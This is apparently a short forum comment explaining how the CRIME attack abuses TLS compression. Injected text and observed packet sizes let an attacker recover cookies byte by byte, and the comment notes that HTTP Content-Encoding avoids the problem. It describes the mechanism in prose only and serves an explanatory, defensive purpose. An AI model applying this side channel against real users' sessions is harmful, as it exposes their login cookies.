[acdha]

Focusing on the CRIME attack people are trying to prevent, TLS compression works for the entire session and will thus include the HTTP headers which are out of band from HTTP transfer encoding. That's how CRIME works: if an attacker can use something like JavaScript to make a request in your browser with some text which they control and can observe the packet sizes, they can measure whether the entire message compressed more than expected, indicating that some bytes are shared between the browser-generated headers and their injected contents. Repeat enough times and you can recover cookies byte by byte. See http://www.imperialviolet.org/2012/09/21/crime.html for the full details.

The good news is that Content-Encoding avoids the attack; the bad news is that it means we're missing the opportunity to avoid transmitting a significant chunk of repetitive text.